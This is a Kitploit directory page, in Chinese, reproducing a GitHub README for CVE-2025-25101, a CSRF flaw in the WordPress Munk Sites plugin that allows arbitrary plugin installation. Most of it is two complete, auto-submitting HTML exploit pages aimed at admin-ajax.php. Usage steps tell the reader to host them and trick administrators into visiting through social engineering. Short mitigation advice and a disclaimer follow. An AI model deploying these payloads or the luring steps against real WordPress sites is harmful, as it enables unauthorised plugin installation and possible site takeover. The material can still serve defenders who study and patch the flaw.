Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-25101 — WordPress Munk Sites 插件 <= 1.0.7 - CSRF 到任意插件安装漏洞 | Kitploit
工具/GitHubGitHub/nxploited/cve-2025-25101
漏洞分析漏洞利用Web应用程序漏洞利用钓鱼攻击社会工程学学习与教育
GitHubnxploited/cve-2025-25101

CVE-2025-25101

WordPress Munk Sites 插件 <= 1.0.7 - CSRF 到任意插件安装漏洞

查看仓库
11年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🚀 CVE-2025-25101 - WordPress Munk Sites 插件 <= 1.0.7 - CSRF 导致任意插件安装

📌 概述

CVE-2025-25101 是 MetricThemes Munk Sites 插件(版本 ≤ 1.0.7)中的一个 跨站请求伪造 (CSRF) 漏洞。
此漏洞允许 未认证的攻击者 诱骗管理员安装并激活任意插件,可能导致 远程代码执行 (RCE) 或 网站被攻破。

🛑 受影响版本

  • Munk Sites 插件 <= 1.0.7
  • WordPress 插件处于激活状态的任何版本

🛡️ 安全评分 (CVSS 评分)

分数严重性版本向量字符串
9.6🔥 严重3.1CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

🔥 漏洞利用说明

🛠️ 漏洞原理:

Munk Sites 插件中的 CSRF 缺陷 允许攻击者强制已登录的 WordPress 管理员 在 不知情的情况下 安装并激活任意 WordPress 插件。
这是通过利用一个 未受保护的 admin-ajax.php 请求 实现的,该请求缺少 CSRF 令牌验证。

📌 漏洞利用流程:

  1. 攻击者构造一个包含 CSRF 负载的恶意网页。
  2. 受害者(WordPress 管理员)访问攻击者的网页。
  3. 漏洞利用程序静默地向 WordPress 发送请求,安装并激活任意插件。
  4. 插件在管理员未进行任何交互的情况下被安装并激活。

💻 漏洞利用代码

1️⃣ CSRF 漏洞利用 - 安装插件

此负载强制受害者安装 hello-world 插件。

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Installation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #5bc0de; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Install 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Installing plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_install_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin installed successfully!</span>"; }, 5000);</script>
</body>
</html>

2️⃣ CSRF 漏洞利用 - 激活插件

此负载强制受害者激活 hello-world 插件。

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF Exploit - Plugin Activation</title>
    <style>
        body { font-family: Arial, sans-serif; text-align: center; background: #f4f4f4; padding: 20px; }
        h1 { color: #d9534f; } h2 { color: #f0ad4e; }
        .output { margin-top: 20px; padding: 10px; background: white; box-shadow: 0 0 10px rgba(0, 0, 0, 0.1); }
        .success { color: #5cb85c; font-weight: bold; }
    </style>
</head>
<body onload="document.forms[0].submit()">
    <h1>📌 CVE-2025-25101</h1>
    <h2>CSRF Exploit - Activate 'Hello World' Plugin</h2>
    <h3>🚀 Exploit by: <b>Nxploit | Khaled Alenazi</b></h3>
    <div class="output" id="output">🔄 Activating plugin...</div>
    <form action="http://target.com/wp-admin/admin-ajax.php" method="GET">
        <input type="hidden" name="action" value="cs_active_plugin">
        <input type="hidden" name="plugin" value="hello-world">
    </form>
    <script>setTimeout(() => { document.getElementById("output").innerHTML = "<span class='success'>✅ Plugin activated successfully!</span>"; }, 5000);</script>
</body>
</html>

🔥 使用方法

  1. 在攻击者控制的服务器上托管恶意 HTML 文件(install.html 和 activate.html)。
  2. 通过社会工程诱使 WordPress 管理员访问 install.html。
  3. 一旦插件安装完成,再诱骗他们访问 activate.html。
  4. hello-world 插件将在管理员未同意的情况下被安装并激活!

🚧 缓解措施

🔒 如何保护您的 WordPress 站点:

  • 升级 Munk Sites 插件到最新版本(如有补丁可用)。
  • 使用 Wordfence 或 Sucuri 等 WordPress 安全插件 来阻止 CSRF 尝试。
  • 通过 .htaccess 或 Nginx 配置中的安全规则限制对 admin-ajax.php 的访问。
  • 确保只有经过身份验证和授权的用户才能安装或激活插件。
  • 使用 wp_nonce_field() 和 check_admin_referer() 实现 CSRF 保护。

📜 免责声明

⚠️ 此漏洞利用仅用于教育和安全研究目的。
⚠️ 未经明确许可在系统上未经授权使用是违法的。
⚠️ 作者对此代码的任何滥用不承担任何责任。


⭐ 支持与贡献

如果您认为此研究有价值,欢迎 ⭐ 给仓库加星,并通过报告 新漏洞 做出贡献。

作者:Nxploit | Khaled Alenazi

下载工具